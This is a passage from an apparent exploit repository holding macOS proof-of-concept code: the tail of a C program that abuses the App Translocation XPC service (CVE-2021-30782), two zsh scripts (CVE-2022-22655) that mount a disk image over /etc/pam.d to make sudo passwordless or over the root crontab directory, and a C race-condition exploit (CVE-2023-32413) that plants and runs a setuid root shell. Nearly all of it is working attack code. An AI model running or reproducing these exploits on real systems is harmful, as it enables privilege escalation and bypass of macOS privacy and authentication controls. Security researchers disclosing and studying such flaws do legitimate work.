tmpdir, "AppTranslocation/d/d/Library"); 17 | 18 | //add quarantine attribute to Library so translocation can occur 19 | char command[MAXPATHLEN]; 20 | snprintf(command, sizeof(command), "%s%s", "xattr -w com.apple.quarantine \"0083;603abfc5;Safari;FB909FBD-7F1E-4AA1-8D93-CB706A20135C\" ", original); 21 | system(command); 22 | 23 | char command2[MAXPATHLEN]; 24 | snprintf(command2, sizeof(command2), "%s%s%s", "mkdir ", tmpdir, "/AppTranslocation"); 25 | system(command2); 26 | 27 | 28 | 29 | /* from here is just calling the translocation XPC service */ 30 | 31 | uint64_t flags = 0; 32 | char* outPath; 33 | 34 | /* XPC Function keys */ 35 | const char* kSecTranslocateXPCFuncCreate = "create"; 36 | const char* kSecTranslocateXPCFuncCheckIn = "check-in"; 37 | 38 | /* XPC message argument keys */ 39 | const char* kSecTranslocateXPCMessageFunction = "function"; 40 | const char* kSecTranslocateXPCMessageOriginalPath = "original"; 41 | const char* kSecTranslocateXPCMessageDestinationPath = "dest"; 42 | const char* kSecTranslocateXPCMessageOptions= "opts"; 43 | const char* kSecTranslocateXPCMessagePid = "pid"; 44 | 45 | /*XPC message reply keys */ 46 | const char* kSecTranslocateXPCReplyError = "error"; 47 | const char* kSecTranslocateXPCReplySecurePath = "result"; 48 | 49 | xpc_connection_t service; 50 | xpc_object_t msg; 51 | 52 | msg = xpc_dictionary_create(NULL, NULL, 0); 53 | 54 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageFunction, kSecTranslocateXPCFuncCreate); 55 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageOriginalPath, original); 56 | xpc_dictionary_set_int64(msg, kSecTranslocateXPCMessageOptions, flags); 57 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageDestinationPath, destination); 58 | 59 | 60 | service = xpc_connection_create_mach_service("com.apple.security.translocation", NULL, 0); 61 | if (service == NULL) { 62 | perror("xpc_connection_create_mach_service"); 63 | } 64 | 65 | xpc_connection_set_event_handler(service, ^(xpc_object_t event) { 66 | xpc_type_t type = xpc_get_type(event); 67 | if (type == XPC_TYPE_ERROR) 68 | { 69 | printf("SecTranslocate, client, xpc error: %s", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); 70 | } 71 | else 72 | { 73 | char* description = xpc_copy_description(event); 74 | printf("SecTranslocate, client, xpc unexpected type: %s", description); 75 | 76 | } 77 | }); 78 | 79 | 80 | xpc_connection_resume(service); 81 | 82 | xpc_object_t reply = xpc_connection_send_message_with_reply_sync(service, msg); 83 | xpc_release(msg); 84 | 85 | if(reply == NULL) 86 | { 87 | printf("SecTranslocate, TranslocatorClient, create, no reply returned"); 88 | return -1; 89 | } 90 | 91 | xpc_type_t type = xpc_get_type(reply); 92 | if (type == XPC_TYPE_DICTIONARY) 93 | { 94 | uint64_t error = 0; 95 | error = xpc_dictionary_get_int64(reply, kSecTranslocateXPCReplyError); 96 | if(error != 0 ) 97 | { 98 | printf("SecTranslocate, TranslocatorClient, create, error received %lld", error); 99 | xpc_release(reply); 100 | return -1; 101 | } 102 | const char * result = xpc_dictionary_get_string(reply, kSecTranslocateXPCReplySecurePath); 103 | if (result == NULL) 104 | { 105 | printf("SecTranslocate, TranslocatorClient, create, no result path received"); 106 | xpc_release(reply); 107 | return -1; 108 | } 109 | outPath=result; 110 | xpc_release(reply); 111 | } 112 | else 113 | { 114 | const char* errorMsg = NULL; 115 | if (type == XPC_TYPE_ERROR) 116 | { 117 | errorMsg = "SecTranslocate, TranslocatorClient, create, xpc error returned: %s"; 118 | } 119 | else 120 | { 121 | errorMsg = "SecTranslocate, TranslocatorClient, create, unexpected type of return object: %s"; 122 | } 123 | const char *s = xpc_copy_description(reply); 124 | printf(errorMsg, s); 125 | free((char*)s); 126 | xpc_release(reply); 127 | return -1; 128 | } 129 | 130 | printf("%s\n",outPath); 131 | 132 | 133 | } 134 | -------------------------------------------------------------------------------- /cve-2021-30782_tcc_apptranslocation/xpctrans.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2021-30782_tcc_apptranslocation/xpctrans.mov -------------------------------------------------------------------------------- /cve-2022-22655_macos_tcc_adminconfig_bypass/bypass-config.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | # Make sure only root can run our script 4 | if [ "$(id -u)" != "0" ]; then 5 | echo "[-] Error: This script must be run as root" 6 | exit 1 7 | fi 8 | 9 | echo "[i] create a disk image" 10 | hdiutil create /tmp/tmp.dmg -size 2m -volname "bypass" -fs APFS 11 | hdiutil attach /tmp/tmp.dmg 12 | 13 | echo "[i] copy pam config files to our disk image" 14 | cp /etc/pam.d/* /Volumes/bypass 15 | 16 | echo "[i] add write permission to the files we want to edit" 17 | chmod +w /Volumes/bypass/sudo 18 | 19 | echo "[i] add rule to sudo" 20 | echo -e "auth sufficient pam_permit.so\n$(cat /Volumes/bypass/sudo)" > /Volumes/bypass/sudo 21 | 22 | echo "[i] unmount" 23 | hdiutil detach /Volumes/bypass 24 | 25 | echo "[i] mount over pam.d" 26 | hdiutil attach -mountpoint /etc/pam.d -owners on /tmp/tmp.dmg -------------------------------------------------------------------------------- /cve-2022-22655_macos_tcc_adminconfig_bypass/poc-admintcc-bypass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | #set -x 3 | 4 | #Make sure arguments are supplied 5 | if [ $# -eq 0 ] 6 | then 7 | echo "Error: No arguments supplied\n\t0 - mount over crontabs\n\t1 - mount over pam.d\n" 8 | exit 1 9 | fi 10 | 11 | if [ $1 -ne 0 -a $1 -ne 1 ] 12 | then 13 | echo "Error: argument must be 0 or 1\n\t0 - mount over crontabs\n\t1 - mount over pam.d\n" 14 | exit 1 15 | fi 16 | 17 | # Make sure only root can run our script 18 | if [ "$(id -u)" != "0" ]; then 19 | echo "Error: This script must be run as root" 20 | exit 1 21 | fi 22 | 23 | #cleanup 24 | rm /tmp/tmp.dmg 25 | 26 | #create a disk image 27 | hdiutil create /tmp/tmp.dmg -size 2m -ov -volname "bypass" -fs APFS 28 | hdiutil attach /tmp/tmp.dmg 29 | 30 | #copy pam config files to our disk image 31 | cp /etc/pam.d/* /Volumes/bypass 32 | 33 | #add write permission to the files we want to edit 34 | chmod +w /Volumes/bypass/sshd 35 | chmod +w /Volumes/bypass/sudo 36 | 37 | #add rule to sudo 38 | echo -e "auth sufficient pam_permit.so\n$(cat /Volumes/bypass/sudo)" > /Volumes/bypass/sudo 39 | 40 | #add crontab file to disk image 41 | CMD="touch /private/tmp/crontab_tcc_bypassed.txt" 42 | echo "* * * * *" "$CMD" > /Volumes/bypass/root 43 | sudo chown root:wheel /Volumes/bypass/root 44 | sudo chown 700 /Volumes/bypass/root 45 | 46 | #unmount 47 | hdiutil detach /Volumes/bypass 48 | 49 | 50 | if [ $1 -eq 1 ] 51 | then 52 | #mount over pam.d 53 | hdiutil attach -mountpoint /etc/pam.d -owners on /tmp/tmp.dmg 54 | fi 55 | 56 | if [ $1 -eq 0 ] 57 | then 58 | #or mount over crontabs 59 | hdiutil attach -mountpoint /private/var/at/tabs -owners on /tmp/tmp.dmg 60 | 61 | #change ownership from _unknown:_unknown to root:wheel 62 | chflags -R nouappnd /private/var/at/tabs 63 | chflags -R nouappnd /private/var/at/tabs/* 64 | chown root:wheel /private/var/at/tabs/* 65 | fi -------------------------------------------------------------------------------- /cve-2023-32413-chmodfd/chmodfd.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | CVE-2023-32413 4 | Originally found by Eloi Benoist-Vanderbeken (@elvanderb) 5 | Presented at: 6 | HEXACON2023 - Eloi BenoistVanderbeken - Finding and exploiting an old XNU logic bug 7 | https://www.youtube.com/watch?v=J2QR58JAO7Q&ab_channel=Hexacon 8 | 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #define SOURCE "/tmp/bin.c" 20 | #define FAKEFILE "/tmp/myfile" 21 | #define BINFILE "/tmp/bin" 22 | #define SUIDFILE "/private/var/log/weekly.out" 23 | 24 | void log_message(const char *message) { 25 | printf("%s\n", message); // Log messages to stdout 26 | } 27 | 28 | // Thread function to open/close FAKEFILE and BINFILE alternately 29 | void *open_close_loop(void *arg) { 30 | while (1) { 31 | int fd; 32 | 33 | // Open FAKEFILE and then close it 34 | fd = open(FAKEFILE, O_RDONLY); 35 | if (fd == -1) { 36 | perror("Failed to open FAKEFILE"); 37 | } else { 38 | usleep(100); 39 | close(fd); 40 | } 41 | 42 | // Open SUIDFILE and then close it 43 | fd = open(SUIDFILE, O_RDONLY); 44 | if (fd == -1) { 45 | perror("Failed to open BINFILE"); 46 | } else { 47 | usleep(100); 48 | close(fd); 49 | } 50 | } 51 | return NULL; 52 | } 53 | 54 | int is_correct_chmod() { 55 | struct stat fileStat; 56 | 57 | // Get the file status 58 | if (stat(SUIDFILE, &fileStat) < 0) { 59 | perror("stat"); 60 | } 61 | 62 | // Extract the file permissions (mode) 63 | mode_t perm = fileStat.st_mode & (S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID); 64 | 65 | // Check if the permissions are rwsrwxrwx 66 | if (perm == (S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID)) { 67 | return 1; 68 | } else { 69 | return 0; 70 | } 71 | } 72 | 73 | void attempt_chmod() { 74 | 75 | while (1) { 76 | int ret = chmod("/dev/fd/3", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID); 77 | if(is_correct_chmod()) { 78 | log_message("[+] chmod successful"); 79 | break; 80 | } 81 | } 82 | } 83 | 84 | 85 | int main() { 86 | pthread_t thread_id; 87 | FILE *file; 88 | 89 | file = fopen(FAKEFILE, "w"); 90 | if (file == NULL) { 91 | perror("Failed to create file"); 92 | return 1; 93 | } 94 | fclose(file); 95 | 96 | file = fopen(SOURCE, "w"); 97 | if (file == NULL) { 98 | perror("Failed to create file"); 99 | return 1; 100 | } 101 | 102 | // Write the contents into the file 103 | fprintf(file, "#include \n"); 104 | fprintf(file, "#include \n"); 105 | fprintf(file, "#include \n"); 106 | fprintf(file, "#include \n\n"); 107 | fprintf(file, "int main(int argc, const char **argv)\n"); 108 | fprintf(file, "{\n"); 109 | fprintf(file, " setuid(0);\n"); 110 | fprintf(file, " seteuid(0);\n"); 111 | fprintf(file, " system(\"/bin/bash\");\n"); 112 | fprintf(file, "}\n"); 113 | 114 | // Close the file after writing 115 | fclose(file); 116 | 117 | // Compile the generated C program using gcc 118 | char command[256]; 119 | snprintf(command, sizeof(command), "gcc %s -o %s", SOURCE, BINFILE); 120 | 121 | // Execute the compilation command 122 | system(command); 123 | 124 | if (pthread_create(&thread_id, NULL, open_close_loop, NULL) != 0) { 125 | perror("Failed to create thread"); 126 | exit(EXIT_FAILURE); 127 | } 128 | 129 | attempt_chmod(); 130 | 131 | char command2[256]; 132 | snprintf(command2, sizeof(command2), "cat %s > %s", BINFILE, SUIDFILE); 133 | 134 | system(command2); 135 | 136 | attempt_chmod(); 137 | 138 | log_message("[+] getting root"); 139 | 140 | system(SUIDFILE); 141 | exit(0); 142 | // Wait for the thread to finish (it won't in this case) 143 | pthread_join(thread_id, NULL); 144 | 145 | return 0; 146 | } 147 | --------------------------------------------------------------------------------